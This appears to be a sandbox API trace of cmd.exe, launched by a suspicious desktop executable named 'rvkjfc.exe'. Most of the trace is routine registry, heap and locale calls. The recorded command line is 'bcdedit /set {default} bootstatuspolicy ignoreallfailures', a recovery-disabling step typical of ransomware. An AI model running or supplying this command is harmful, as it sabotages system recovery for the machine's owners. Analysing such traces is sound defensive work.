lpProcName="SetThreadUILanguage") returned 0x77956d40 [0044.931] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0044.931] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0044.931] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fe48 | out: phkResult=0x26fe48*=0x0) returned 0x2 [0044.932] VirtualQuery (in: lpAddress=0x26fe30, lpBuffer=0x26fdb0, dwLength=0x30 | out: lpBuffer=0x26fdb0*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.932] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fdb0, dwLength=0x30 | out: lpBuffer=0x26fdb0*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.932] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fdb0, dwLength=0x30 | out: lpBuffer=0x26fdb0*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.932] VirtualQuery (in: lpAddress=0x174000, lpBuffer=0x26fdb0, dwLength=0x30 | out: lpBuffer=0x26fdb0*(BaseAddress=0x174000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0044.932] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fdb0, dwLength=0x30 | out: lpBuffer=0x26fdb0*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xf0000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0044.932] GetConsoleOutputCP () returned 0x1b5 [0044.932] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d5bfe0 | out: lpCPInfo=0x49d5bfe0) returned 1 [0044.932] SetConsoleCtrlHandler (HandlerRoutine=0x49d43184, Add=1) returned 1 [0044.932] _get_osfhandle (_FileHandle=1) returned 0x7 [0044.932] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0044.933] _get_osfhandle (_FileHandle=1) returned 0x7 [0044.933] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d4e194 | out: lpMode=0x49d4e194) returned 1 [0044.933] _get_osfhandle (_FileHandle=1) returned 0x7 [0044.933] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0044.933] _get_osfhandle (_FileHandle=0) returned 0x3 [0044.933] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d4e198 | out: lpMode=0x49d4e198) returned 1 [0044.933] GetEnvironmentStringsW () returned 0x378b00* [0044.933] GetProcessHeap () returned 0x360000 [0044.933] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xa7c) returned 0x379590 [0044.933] FreeEnvironmentStringsW (penv=0x378b00) returned 1 [0044.934] GetProcessHeap () returned 0x360000 [0044.934] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x8) returned 0x378980 [0044.934] GetEnvironmentStringsW () returned 0x378b00* [0044.934] GetProcessHeap () returned 0x360000 [0044.934] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xa7c) returned 0x37a020 [0044.934] FreeEnvironmentStringsW (penv=0x378b00) returned 1 [0044.934] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ed08 | out: phkResult=0x26ed08*=0x44) returned 0x0 [0044.934] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ed00, lpData=0x26ed20, lpcbData=0x26ed04*=0x1000 | out: lpType=0x26ed00*=0x0, lpData=0x26ed20*=0x18, lpcbData=0x26ed04*=0x1000) returned 0x2 [0044.934] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ed00, lpData=0x26ed20, lpcbData=0x26ed04*=0x1000 | out: lpType=0x26ed00*=0x4, lpData=0x26ed20*=0x1, lpcbData=0x26ed04*=0x4) returned 0x0 [0044.934] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ed00, lpData=0x26ed20, lpcbData=0x26ed04*=0x1000 | out: lpType=0x26ed00*=0x0, lpData=0x26ed20*=0x1, lpcbData=0x26ed04*=0x1000) returned 0x2 [0044.934] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ed00, lpData=0x26ed20, lpcbData=0x26ed04*=0x1000 | out: lpType=0x26ed00*=0x4, lpData=0x26ed20*=0x0, lpcbData=0x26ed04*=0x4) returned 0x0 [0044.934] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ed00, lpData=0x26ed20, lpcbData=0x26ed04*=0x1000 | out: lpType=0x26ed00*=0x4, lpData=0x26ed20*=0x40, lpcbData=0x26ed04*=0x4) returned 0x0 [0044.934] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ed00, lpData=0x26ed20, lpcbData=0x26ed04*=0x1000 | out: lpType=0x26ed00*=0x4, lpData=0x26ed20*=0x40, lpcbData=0x26ed04*=0x4) returned 0x0 [0044.934] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ed00, lpData=0x26ed20, lpcbData=0x26ed04*=0x1000 | out: lpType=0x26ed00*=0x0, lpData=0x26ed20*=0x40, lpcbData=0x26ed04*=0x1000) returned 0x2 [0044.934] RegCloseKey (hKey=0x44) returned 0x0 [0044.934] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ed08 | out: phkResult=0x26ed08*=0x44) returned 0x0 [0044.934] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ed00, lpData=0x26ed20, lpcbData=0x26ed04*=0x1000 | out: lpType=0x26ed00*=0x0, lpData=0x26ed20*=0x40, lpcbData=0x26ed04*=0x1000) returned 0x2 [0044.934] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ed00, lpData=0x26ed20, lpcbData=0x26ed04*=0x1000 | out: lpType=0x26ed00*=0x4, lpData=0x26ed20*=0x1, lpcbData=0x26ed04*=0x4) returned 0x0 [0044.934] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ed00, lpData=0x26ed20, lpcbData=0x26ed04*=0x1000 | out: lpType=0x26ed00*=0x0, lpData=0x26ed20*=0x1, lpcbData=0x26ed04*=0x1000) returned 0x2 [0044.934] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ed00, lpData=0x26ed20, lpcbData=0x26ed04*=0x1000 | out: lpType=0x26ed00*=0x4, lpData=0x26ed20*=0x0, lpcbData=0x26ed04*=0x4) returned 0x0 [0044.934] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ed00, lpData=0x26ed20, lpcbData=0x26ed04*=0x1000 | out: lpType=0x26ed00*=0x4, lpData=0x26ed20*=0x9, lpcbData=0x26ed04*=0x4) returned 0x0 [0044.934] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ed00, lpData=0x26ed20, lpcbData=0x26ed04*=0x1000 | out: lpType=0x26ed00*=0x4, lpData=0x26ed20*=0x9, lpcbData=0x26ed04*=0x4) returned 0x0 [0044.935] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ed00, lpData=0x26ed20, lpcbData=0x26ed04*=0x1000 | out: lpType=0x26ed00*=0x0, lpData=0x26ed20*=0x9, lpcbData=0x26ed04*=0x1000) returned 0x2 [0044.935] RegCloseKey (hKey=0x44) returned 0x0 [0044.935] time (in: timer=0x0 | out: timer=0x0) returned 0x5e5fdfec [0044.935] srand (_Seed=0x5e5fdfec) [0044.935] GetCommandLineW () returned="/C bcdedit /set {default} bootstatuspolicy ignoreallfailures" [0044.935] GetCommandLineW () returned="/C bcdedit /set {default} bootstatuspolicy ignoreallfailures" [0044.935] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49d5c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0044.935] GetProcessHeap () returned 0x360000 [0044.935] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x218) returned 0x37aab0 [0044.935] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x37aac0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0044.935] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0044.935] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0044.935] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0044.935] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0044.935] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0044.935] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0044.935] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0044.935] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0044.935] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0044.935] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0044.935] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0044.935] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0044.935] GetProcessHeap () returned 0x360000 [0044.935] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x379590 | out: hHeap=0x360000) returned 1 [0044.935] GetEnvironmentStringsW () returned 0x378b00* [0044.936] GetProcessHeap () returned 0x360000 [0044.936] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xa94) returned 0x37acd0 [0044.936] FreeEnvironmentStringsW (penv=0x378b00) returned 1 [0044.936] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0044.936] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0044.936] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0044.936] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0044.936] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0044.936] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0044.936] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0044.936] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0044.936] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0044.936] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0044.936] GetProcessHeap () returned 0x360000 [0044.936] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x5c) returned 0x37b770 [0044.936] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26fb10 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0044.936] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x26fb10, lpFilePart=0x26faf0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26faf0*="Desktop") returned 0x25 [0044.936] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0044.936] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f820 | out: lpFindFileData=0x26f820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x37b7e0 [0044.936] FindClose (in: hFindFile=0x37b7e0 | out: hFindFile=0x37b7e0) returned 1 [0044.936] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x26f820 | out: lpFindFileData=0x26f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x37b7e0 [0044.937] FindClose (in: hFindFile=0x37b7e0 | out: hFindFile=0x37b7e0) returned 1 [0044.937] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0044.937] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x26f820 | out: lpFindFileData=0x26f820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x183bc620, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x183bc620, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x37b7e0 [0044.937] FindClose (in: hFindFile=0x37b7e0 | out: hFindFile=0x37b7e0) returned 1 [0044.937] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0044.937] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0044.937] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0044.937] GetProcessHeap () returned 0x360000 [0044.937] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37acd0 | out: hHeap=0x360000) returned 1 [0044.937] GetEnvironmentStringsW () returned 0x37b7e0* [0044.937] GetProcessHeap () returned 0x360000 [0044.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xae8) returned 0x37c2d0 [0044.937] FreeEnvironmentStringsW (penv=0x37b7e0) returned 1 [0044.937] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49d5c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0044.937] GetProcessHeap () returned 0x360000 [0044.937] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37b770 | out: hHeap=0x360000) returned 1 [0044.937] GetProcessHeap () returned 0x360000 [0044.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x4016) returned 0x37cdc0 [0044.938] GetProcessHeap () returned 0x360000 [0044.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x88) returned 0x3795f0 [0044.938] GetProcessHeap () returned 0x360000 [0044.938] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37cdc0 | out: hHeap=0x360000) returned 1 [0044.938] GetConsoleOutputCP () returned 0x1b5 [0045.056] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d5bfe0 | out: lpCPInfo=0x49d5bfe0) returned 1 [0045.056] GetUserDefaultLCID () returned 0x409 [0045.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49d57b50, cchData=8 | out: lpLCData=":") returned 2 [0045.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fc20, cchData=128 | out: lpLCData="0") returned 2 [0045.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fc20, cchData=128 | out: lpLCData="0") returned 2 [0045.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fc20, cchData=128 | out: lpLCData="1") returned 2 [0045.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49d6a740, cchData=8 | out: lpLCData="/") returned 2 [0045.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49d6a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0045.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49d6a460, cchData=32 | out: lpLCData="Tue") returned 4 [0045.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49d6a420, cchData=32 | out: lpLCData="Wed") returned 4 [0045.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49d6a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0045.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49d6a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0045.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49d6a360, cchData=32 | out: lpLCData="Sat") returned 4 [0045.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49d6a700, cchData=32 | out: lpLCData="Sun") returned 4 [0045.058] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49d57b40, cchData=8 | out: lpLCData=".") returned 2 [0045.058] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49d6a4e0, cchData=8 | out: lpLCData=",") returned 2 [0045.058] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0045.058] GetProcessHeap () returned 0x360000 [0045.058] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x20c) returned 0x3796f0 [0045.058] GetConsoleTitleW (in: lpConsoleTitle=0x3796f0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 0x30 [0045.058] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0045.059] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0045.059] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0045.059] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0045.059] GetProcessHeap () returned 0x360000 [0045.059] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x4012) returned 0x37cdc0 [0045.059] GetProcessHeap () returned 0x360000 [0045.059] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37cdc0 | out: hHeap=0x360000) returned 1 [0045.059] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0045.059] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0045.059] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0045.060] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0045.060] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0045.060] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0045.060] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0045.060] GetProcessHeap () returned 0x360000 [0045.060] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0xb0) returned 0x379910 [0045.060] GetProcessHeap () returned 0x360000 [0045.060] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x20) returned 0x374630 [0045.061] GetProcessHeap () returned 0x360000 [0045.061] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x76) returned 0x3799d0 [0045.061] GetConsoleTitleW (in: lpConsoleTitle=0x26fb30, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 0x30 [0045.062] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0045.062] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0045.062] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0045.062] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0045.062] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0045.062] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0045.062] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0045.062] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0045.062] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0045.062] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0045.062] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0045.062] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0045.062] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0045.062] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0045.062] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0045.062] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0045.062] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0045.062] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0045.062] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0045.062] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0045.062] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0045.063] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0045.063] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0045.063] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0045.063] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0045.063] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0045.063] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0045.063] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0045.063] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0045.063] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0045.063] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0045.063] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0045.063] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0045.063] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0045.063] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0045.063] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0045.063] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0045.063] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0045.063] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0045.063] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0045.063] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0045.063] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0045.063] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0045.063] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0045.063] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0045.063] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0045.063] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0045.063] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0045.063] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0045.063] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0045.063] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0045.063] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0045.063] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0045.063] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0045.063] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0045.063] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0045.063] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0045.063] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0045.063] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0045.063] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0045.063] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0045.064] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0045.064] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0045.064] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0045.064] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0045.064] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0045.064] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0045.064] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0045.064] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0045.064] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0045.064] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0045.064] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0045.064] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0045.064] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0045.064] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0045.064] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0045.064] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0045.064] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0045.064] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0045.064] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0045.064] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0045.064] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0045.064] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0045.064] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0045.064] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0045.064] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0045.064] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0045.064] GetProcessHeap () returned 0x360000 [0045.065] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x218) returned 0x379a50 [0045.065] GetProcessHeap () returned 0x360000 [0045.065] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x86) returned 0x379c70 [0045.065] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0045.065] GetProcessHeap () returned 0x360000 [0045.065] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x8, Size=0x420) returned 0x361320 [0045.065] SetErrorMode (uMode=0x0) returned 0x0 [0045.065] SetErrorMode (uMode=0x1) returned 0x0 [0045.065] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x361330, lpFilePart=0x26f3c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26f3c0*="Desktop") returned 0x25 [0045.065] SetErrorMode (uMode=0x0) returned 0x1 [0045.065] GetProcessHeap () returned 0x360000 [0045.065] RtlReAllocateHeap (Heap=0x360000, Flags=0x0, Ptr=0x361320, Size=0x6c) returned 0x361320 